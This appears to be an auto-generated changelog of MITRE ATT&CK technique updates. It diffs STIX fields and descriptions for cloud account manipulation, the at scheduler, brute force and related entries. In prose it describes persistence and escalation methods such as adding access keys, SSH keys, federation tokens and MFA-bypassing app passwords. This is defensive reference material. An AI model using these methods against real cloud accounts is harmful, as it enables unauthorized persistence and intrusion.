In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence) | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure / Entra ID.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. Alternatively, they may use the CreateLoginProfile API in AWS to add a password that can be used to log into the AWS Management Console for [Cloud Service Dashboard](https://attack.mitre.org/techniques/T1538).(Citation: Permiso Scattered Spider 2023)(Citation: Lacework AI Resource Hijacking 2024) If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)(Citation: Sysdig ScarletEel 2.0) For example, in Entra ID environments, an adversary with the Application Administrator role can add a new set of credentials to their application's service principal. In doing so the adversary would be able to access the service principal’s roles and permissions, which may be different from those of the Application Administrator.(Citation: SpecterOps Azure Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials to [Forge Web Credentials](https://attack.mitre.org/techniques/T1606) tied to the permissions of the original user account. These temporary credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated.
(Citation: Crowdstrike AWS User Federation Persistence)
In Entra ID environments with the app password feature enabled, adversaries may be able to add an app password to a user account.(Citation: Mandiant APT42 Operations 2024) As app passwords are intended to be used with legacy devices that do not support multi-factor authentication (MFA), adding an app password can allow an adversary to bypass MFA requirements. Additionally, app passwords may remain valid even if the user’s primary password is reset.(Citation: Microsoft Entra ID App Passwords) |
x_mitre_version | 2.7 | 2.8 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Lacework AI Resource Hijacking 2024', 'description': 'Detecting AI resource-hijacking with Composite Alerts. (2024, June 6). Lacework Labs. Retrieved July 1, 2024.', 'url': 'https://www.lacework.com/blog/detecting-ai-resource-hijacking-with-composite-alerts'} |
external_references | | {'source_name': 'Permiso Scattered Spider 2023', 'description': 'Ian Ahl. (2023, September 20). LUCR-3: SCATTERED SPIDER GETTING SAAS-Y IN THE CLOUD. Retrieved September 25, 2023.', 'url': 'https://permiso.io/blog/lucr-3-scattered-spider-getting-saas-y-in-the-cloud'} |
external_references | | {'source_name': 'Microsoft Entra ID App Passwords', 'description': 'Microsoft. (2023, October 23). Enforce Microsoft Entra multifactor authentication with legacy applications using app passwords. Retrieved May 28, 2024.', 'url': 'https://learn.microsoft.com/en-us/entra/identity/authentication/howto-mfa-app-passwords'} |
external_references | | {'source_name': 'Mandiant APT42 Operations 2024', 'description': "Ofir Rozmann, Asli Koksal, Adrian Hernandez, Sarah Bock, and Jonathan Leathery. (2024, May 1). Uncharmed: Untangling Iran's APT42 Operations. Retrieved May 28, 2024.", 'url': 'https://cloud.google.com/blog/topics/threat-intelligence/untangling-iran-apt42-operations'} |
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | Active Directory: Active Directory Object Creation |
x_mitre_data_sources | | Active Directory: Active Directory Object Modification |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
[T1098.003] Account Manipulation: Additional Cloud Roles
Current version: 2.5
Version changed from: 2.4 → 2.5
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-29 18:29:06.873000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.4 | 2.5 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Azure AD | |
[T1098.002] Account Manipulation: Additional Email Delegate Permissions
Current version: 2.2
Version changed from: 2.1 → 2.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-03 15:46:06.706000+00:00 | 2024-10-15 15:37:25.303000+00:00 |
x_mitre_version | 2.1 | 2.2 |
x_mitre_platforms[1] | Office 365 | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Nilesh Dherange (Gurucul) |
x_mitre_contributors | | Naveen Vijayaraghavan |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | Naveen Vijayaraghavan, Nilesh Dherange (Gurucul) | |
x_mitre_platforms | Google Workspace | |
[T1550.001] Use Alternate Authentication Material: Application Access Token
Current version: 1.7
Version changed from: 1.6 → 1.7
New Mitigations:
- M1036: Account Use Policies
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-04-28 15:43:18.080000+00:00 | 2024-10-15 15:38:11.583000+00:00 |
x_mitre_version | 1.6 | 1.7 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
x_mitre_platforms | Azure AD | |
[T1499.003] Endpoint Denial of Service: Application Exhaustion Flood
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-25 18:07:45.176000+00:00 | 2024-10-15 15:41:49.168000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1071] Application Layer Protocol
Current version: 2.3
Version changed from: 2.2 → 2.3
|
|
t | Adversaries may communicate using OSI application layer prot | t | Adversaries may communicate using OSI application layer prot |
| ocols to avoid detection/network filtering by blending in wi | | ocols to avoid detection/network filtering by blending in wi |
| th existing traffic. Commands to the remote system, and ofte | | th existing traffic. Commands to the remote system, and ofte |
| n the results of those commands, will be embedded within the | | n the results of those commands, will be embedded within the |
| protocol traffic between the client and server. Adversari | | protocol traffic between the client and server. Adversari |
| es may utilize many different protocols, including those use | | es may utilize many different protocols, including those use |
| d for web browsing, transferring files, electronic mail, or | | d for web browsing, transferring files, electronic mail, DNS |
| DNS. For connections that occur internally within an enclave | | , or publishing/subscribing. For connections that occur inte |
| (such as those between a proxy or pivot node and other node | | rnally within an enclave (such as those between a proxy or p |
| s), commonly used protocols are SMB, SSH, or RDP.(Citation: | | ivot node and other nodes), commonly used protocols are SMB, |
| Mandiant APT29 Eye Spy Email Nov 22) | | SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) |
| | | |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-17 22:52:23.454000+00:00 | 2024-08-28 14:10:33.145000+00:00 |
description | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) | Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, DNS, or publishing/subscribing. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.(Citation: Mandiant APT29 Eye Spy Email Nov 22) |
x_mitre_version | 2.2 | 2.3 |
[T1499.004] Endpoint Denial of Service: Application or System Exploitation
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-25 18:11:13.604000+00:00 | 2024-10-15 15:42:23.001000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | SaaS | |
x_mitre_platforms | Google Workspace | |
[T1053.002] Scheduled Task/Job: At
Current version: 2.3
Version changed from: 2.2 → 2.3
|
|
t | Adversaries may abuse the [at](https://attack.mitre.org/soft | t | Adversaries may abuse the [at](https://attack.mitre.org/soft |
| ware/S0110) utility to perform task scheduling for initial o | | ware/S0110) utility to perform task scheduling for initial o |
| r recurring execution of malicious code. The [at](https://at | | r recurring execution of malicious code. The [at](https://at |
| tack.mitre.org/software/S0110) utility exists as an executab | | tack.mitre.org/software/S0110) utility exists as an executab |
| le within Windows, Linux, and macOS for scheduling tasks at | | le within Windows, Linux, and macOS for scheduling tasks at |
| a specified time and date. Although deprecated in favor of [ | | a specified time and date. Although deprecated in favor of [ |
| Scheduled Task](https://attack.mitre.org/techniques/T1053/00 | | Scheduled Task](https://attack.mitre.org/techniques/T1053/00 |
| 5)'s [schtasks](https://attack.mitre.org/software/S0111) in | | 5)'s [schtasks](https://attack.mitre.org/software/S0111) in |
| Windows environments, using [at](https://attack.mitre.org/so | | Windows environments, using [at](https://attack.mitre.org/so |
| ftware/S0110) requires that the Task Scheduler service be ru | | ftware/S0110) requires that the Task Scheduler service be ru |
| nning, and the user to be logged on as a member of the local | | nning, and the user to be logged on as a member of the local |
| Administrators group. On Linux and macOS, [at](https://att | | Administrators group. In addition to explicitly running the |
| ack.mitre.org/software/S0110) may be invoked by the superuse | | `at` command, adversaries may also schedule a task with [at |
| r as well as any users added to the <code>at.allow</code> fi | | ](https://attack.mitre.org/software/S0110) by directly lever |
| le. If the <code>at.allow</code> file does not exist, the <c | | aging the [Windows Management Instrumentation](https://attac |
| ode>at.deny</code> file is checked. Every username not liste | | k.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class |
| d in <code>at.deny</code> is allowed to invoke [at](https:// | | .(Citation: Malicious Life by Cybereason) On Linux and macO |
| attack.mitre.org/software/S0110). If the <code>at.deny</code | | S, [at](https://attack.mitre.org/software/S0110) may be invo |
| > exists and is empty, global use of [at](https://attack.mit | | ked by the superuser as well as any users added to the <code |
| re.org/software/S0110) is permitted. If neither file exists | | >at.allow</code> file. If the <code>at.allow</code> file doe |
| (which is often the baseline) only the superuser is allowed | | s not exist, the <code>at.deny</code> file is checked. Every |
| to use [at](https://attack.mitre.org/software/S0110).(Citati | | username not listed in <code>at.deny</code> is allowed to i |
| on: Linux at) Adversaries may use [at](https://attack.mitre | | nvoke [at](https://attack.mitre.org/software/S0110). If the |
| .org/software/S0110) to execute programs at system startup o | | <code>at.deny</code> exists and is empty, global use of [at] |
| r on a scheduled basis for [Persistence](https://attack.mitr | | (https://attack.mitre.org/software/S0110) is permitted. If n |
| e.org/tactics/TA0003). [at](https://attack.mitre.org/softwar | | either file exists (which is often the baseline) only the su |
| e/S0110) can also be abused to conduct remote [Execution](ht | | peruser is allowed to use [at](https://attack.mitre.org/soft |
| tps://attack.mitre.org/tactics/TA0002) as part of [Lateral M | | ware/S0110).(Citation: Linux at) Adversaries may use [at](h |
| ovement](https://attack.mitre.org/tactics/TA0008) and/or to | | ttps://attack.mitre.org/software/S0110) to execute programs |
| run a process under the context of a specified account (such | | at system startup or on a scheduled basis for [Persistence]( |
| as SYSTEM). In Linux environments, adversaries may also ab | | https://attack.mitre.org/tactics/TA0003). [at](https://attac |
| use [at](https://attack.mitre.org/software/S0110) to break o | | k.mitre.org/software/S0110) can also be abused to conduct re |
| ut of restricted environments by using a task to spawn an in | | mote [Execution](https://attack.mitre.org/tactics/TA0002) as |
| teractive system shell or to run system commands. Similarly, | | part of [Lateral Movement](https://attack.mitre.org/tactics |
| [at](https://attack.mitre.org/software/S0110) may also be u | | /TA0008) and/or to run a process under the context of a spec |
| sed for [Privilege Escalation](https://attack.mitre.org/tact | | ified account (such as SYSTEM). In Linux environments, adve |
| ics/TA0004) if the binary is allowed to run as superuser via | | rsaries may also abuse [at](https://attack.mitre.org/softwar |
| <code>sudo</code>.(Citation: GTFObins at) | | e/S0110) to break out of restricted environments by using a |
| | | task to spawn an interactive system shell or to run system c |
| | | ommands. Similarly, [at](https://attack.mitre.org/software/S |
| | | 0110) may also be used for [Privilege Escalation](https://at |
| | | tack.mitre.org/tactics/TA0004) if the binary is allowed to r |
| | | un as superuser via <code>sudo</code>.(Citation: GTFObins at |
| | | ) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-11-15 14:38:10.876000+00:00 | 2024-10-12 15:53:12.333000+00:00 |
description | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group.
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo .(Citation: GTFObins at) | Adversaries may abuse the [at](https://attack.mitre.org/software/S0110) utility to perform task scheduling for initial or recurring execution of malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within Windows, Linux, and macOS for scheduling tasks at a specified time and date. Although deprecated in favor of [Scheduled Task](https://attack.mitre.org/techniques/T1053/005)'s [schtasks](https://attack.mitre.org/software/S0111) in Windows environments, using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of the local Administrators group. In addition to explicitly running the `at` command, adversaries may also schedule a task with [at](https://attack.mitre.org/software/S0110) by directly leveraging the [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) `Win32_ScheduledJob` WMI class.(Citation: Malicious Life by Cybereason)
On Linux and macOS, [at](https://attack.mitre.org/software/S0110) may be invoked by the superuser as well as any users added to the at.allow file. If the at.allow file does not exist, the at.deny file is checked. Every username not listed in at.deny is allowed to invoke [at](https://attack.mitre.org/software/S0110). If the at.deny exists and is empty, global use of [at](https://attack.mitre.org/software/S0110) is permitted. If neither file exists (which is often the baseline) only the superuser is allowed to use [at](https://attack.mitre.org/software/S0110).(Citation: Linux at)
Adversaries may use [at](https://attack.mitre.org/software/S0110) to execute programs at system startup or on a scheduled basis for [Persistence](https://attack.mitre.org/tactics/TA0003). [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote [Execution](https://attack.mitre.org/tactics/TA0002) as part of [Lateral Movement](https://attack.mitre.org/tactics/TA0008) and/or to run a process under the context of a specified account (such as SYSTEM).
In Linux environments, adversaries may also abuse [at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the binary is allowed to run as superuser via sudo .(Citation: GTFObins at) |
external_references[4]['description'] | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved December 12, 2017. | Loobeek, L. (2017, December 8). leoloobeek Status. Retrieved September 12, 2024. |
external_references[4]['url'] | https://twitter.com/leoloobeek/status/939248813465853953 | https://x.com/leoloobeek/status/939248813465853953 |
x_mitre_version | 2.2 | 2.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
external_references | | {'source_name': 'Malicious Life by Cybereason', 'description': 'Philip Tsukerman. (n.d.). No Win32 Process Needed | Expanding the WMI Lateral Movement Arsenal. Retrieved June 19, 2024.', 'url': 'https://www.cybereason.com/blog/wmi-lateral-movement-win32#blog-subscribe'} |
[T1119] Automated Collection
Current version: 1.3
Version changed from: 1.2 → 1.3
New Detections:
- DS0002: User Account (User Account Authentication)
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-02 13:35:57.680000+00:00 | 2024-09-25 20:40:07.791000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_data_sources | | User Account: User Account Authentication |
x_mitre_platforms | | Office Suite |
[T1552.003] Unsecured Credentials: Bash History
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-03-08 21:34:44.728000+00:00 | 2024-09-12 15:24:04.912000+00:00 |
external_references[1]['description'] | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved July 3, 2017. | Alex Rymdeko-Harvey, Steve Borosh. (2016, May 14). External to DA, the OS X Way. Retrieved September 12, 2024. |
external_references[1]['url'] | http://www.slideshare.net/StephanBorosh/external-to-da-the-os-x-way | https://www.slideshare.net/slideshow/external-to-da-the-os-x-way/62021418 |
x_mitre_version | 1.1 | 1.2 |
[T1110] Brute Force
Current version: 2.6
Version changed from: 2.5 → 2.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-01-29 18:53:26.593000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 2.5 | 2.6 |
x_mitre_platforms[7] | Google Workspace | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1552.008] Unsecured Credentials: Chat Messages
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-11 00:34:00.779000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1070.008] Indicator Removal: Clear Mailbox Data
Current version: 1.2
Version changed from: 1.1 → 1.2
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-12 20:56:32.743000+00:00 | 2024-10-15 15:43:56.839000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.1 | 1.2 |
x_mitre_platforms[3] | Office 365 | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Google Workspace | |
[T1059.009] Command and Scripting Interpreter: Cloud API
Current version: 1.1
Version changed from: 1.0 → 1.1
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2023-04-14 18:04:54.607000+00:00 | 2024-10-15 15:44:20.143000+00:00 |
x_mitre_attack_spec_version | 3.1.0 | 3.2.0 |
x_mitre_version | 1.0 | 1.1 |
x_mitre_platforms[2] | Office 365 | Office Suite |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Google Workspace | |
[T1087.004] Account Discovery: Cloud Account
Current version: 1.3
Version changed from: 1.2 → 1.3
Details
dictionary_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_attack_spec_version | | 3.2.0 |
x_mitre_deprecated | | False |
dictionary_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_permissions_required | ['User'] | |
values_changedSTIX Field | Old value | New Value |
---|
modified | 2021-03-16 12:54:41.133000+00:00 | 2024-10-15 15:51:18.808000+00:00 |
x_mitre_version | 1.2 | 1.3 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1136.003] Create Account: Cloud Account
Current version: 1.6
Version changed from: 1.5 → 1.6
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-28 16:14:28.678000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.5 | 1.6 |
x_mitre_platforms[3] | Google Workspace | Identity Provider |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
[T1078.004] Valid Accounts: Cloud Accounts
Current version: 1.8
Version changed from: 1.7 → 1.8
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2024-03-29 15:42:13.499000+00:00 | 2024-10-14 22:11:30.271000+00:00 |
x_mitre_version | 1.7 | 1.8 |
iterable_item_addedSTIX Field | Old value | New Value |
---|
x_mitre_contributors | | Arun Seelagan, CISA |
x_mitre_platforms | | Office Suite |
x_mitre_platforms | | Identity Provider |
iterable_item_removedSTIX Field | Old value | New Value |
---|
x_mitre_platforms | Azure AD | |
x_mitre_platforms | Office 365 | |
x_mitre_platforms | Google Workspace | |
[T1586.003] Compromise Accounts: Cloud Accounts
Current version: 1.1
Version changed from: 1.0 → 1.1
|
|
t | Adversaries may compromise cloud accounts that can be used d | t | Adversaries may compromise cloud accounts that can be used d |
| uring targeting. Adversaries can use compromised cloud accou | | uring targeting. Adversaries can use compromised cloud accou |
| nts to further their operations, including leveraging cloud | | nts to further their operations, including leveraging cloud |
| storage services such as Dropbox, Microsoft OneDrive, or AWS | | storage services such as Dropbox, Microsoft OneDrive, or AWS |
| S3 buckets for [Exfiltration to Cloud Storage](https://atta | | S3 buckets for [Exfiltration to Cloud Storage](https://atta |
| ck.mitre.org/techniques/T1567/002) or to [Upload Tool](https | | ck.mitre.org/techniques/T1567/002) or to [Upload Tool](https |
| ://attack.mitre.org/techniques/T1608/002)s. Cloud accounts c | | ://attack.mitre.org/techniques/T1608/002)s. Cloud accounts c |
| an also be used in the acquisition of infrastructure, such a | | an also be used in the acquisition of infrastructure, such a |
| s [Virtual Private Server](https://attack.mitre.org/techniqu | | s [Virtual Private Server](https://attack.mitre.org/techniqu |
| es/T1583/003)s or [Serverless](https://attack.mitre.org/tech | | es/T1583/003)s or [Serverless](https://attack.mitre.org/tech |
| niques/T1583/007) infrastructure. Compromising cloud account | | niques/T1583/007) infrastructure. Additionally, cloud-based |
| s may allow adversaries to develop sophisticated capabilitie | | messaging services such as Twilio, SendGrid, AWS End User Me |
| s without managing their own servers.(Citation: Awake Securi | | ssaging, AWS SNS (Simple Notification Service), or AWS SES ( |
| ty C2 Cloud) A variety of methods exist for compromising cl | | Simple Email Service) may be leveraged for spam or [Phishing |
| oud accounts, such as gathering credentials via [Phishing fo | | ](https://attack.mitre.org/techniques/T1566).(Citation: Palo |
| r Information](https://attack.mitre.org/techniques/T1598), p | | Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Ci |
| urchasing credentials from third-party sites, conducting [Pa | | tation: Netcraft SendGrid 2024) Compromising cloud accounts |
| ssword Spraying](https://attack.mitre.org/techniques/T1110/0 | | may allow adversaries to develop sophisticated capabilities |
| 03) attacks, or attempting to [Steal Application Access Toke | | without managing their own servers.(Citation: Awake Security |
| n](https://attack.mitre.org/techniques/T1528)s.(Citation: MS | | C2 Cloud) A variety of methods exist for compromising clou |
| TIC Nobelium Oct 2021) Prior to compromising cloud accounts, | | d accounts, such as gathering credentials via [Phishing for |
| adversaries may conduct Reconnaissance to inform decisions | | Information](https://attack.mitre.org/techniques/T1598), pur |
| about which accounts to compromise to further their operatio | | chasing credentials from third-party sites, conducting [Pass |
| n. In some cases, adversaries may target privileged service | | word Spraying](https://attack.mitre.org/techniques/T1110/003 |
| provider accounts with the intent of leveraging a [Trusted R | | ) attacks, or attempting to [Steal Application Access Token] |
| elationship](https://attack.mitre.org/techniques/T1199) betw | | (https://attack.mitre.org/techniques/T1528)s.(Citation: MSTI |
| een service providers and their customers.(Citation: MSTIC N | | C Nobelium Oct 2021) Prior to compromising cloud accounts, a |
| obelium Oct 2021) | | dversaries may conduct Reconnaissance to inform decisions ab |
| | | out which accounts to compromise to further their operation. |
| | | In some cases, adversaries may target privileged service pr |
| | | ovider accounts with the intent of leveraging a [Trusted Rel |
| | | ationship](https://attack.mitre.org/techniques/T1199) betwee |
| | | n service providers and their customers.(Citation: MSTIC Nob |
| | | elium Oct 2021) |
Details
values_changedSTIX Field | Old value | New Value |
---|
modified | 2022-10-21 14:21:57.991000+00:00 | 2024-10-16 21:26:36.312000+00:00 |
description | Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
A variety of methods exist for compromising cloud accounts, such as gathering credentials via [Phishing for Information](https://attack.mitre.org/techniques/T1598), purchasing credentials from third-party sites, conducting [Password Spraying](https://attack.mitre.org/techniques/T1110/003) attacks, or attempting to [Steal Application Access Token](https://attack.mitre.org/techniques/T1528)s.(Citation: MSTIC Nobelium Oct 2021) Prior to compromising cloud accounts, adversaries may conduct Reconnaissance to inform decisions about which accounts to compromise to further their operation. In some cases, adversaries may target privileged service provider accounts with the intent of leveraging a [Trusted Relationship](https://attack.mitre.org/techniques/T1199) between service providers and their customers.(Citation: MSTIC Nobelium Oct 2021) | Adversaries may compromise cloud accounts that can be used during targeting. Adversaries can use compromised cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, Microsoft OneDrive, or AWS S3 buckets for [Exfiltration to Cloud Storage](https://attack.mitre.org/techniques/T1567/002) or to [Upload Tool](https://attack.mitre.org/techniques/T1608/002)s. Cloud accounts can also be used in the acquisition of infrastructure, such as [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003)s or [Serverless](https://attack.mitre.org/techniques/T1583/007) infrastructure. Additionally, cloud-based messaging services such as Twilio, SendGrid, AWS End User Messaging, AWS SNS (Simple Notification Service), or AWS SES (Simple Email Service) may be leveraged for spam or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Netcraft SendGrid 2024) Compromising cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.(Citation: Awake Security C2 Cloud)
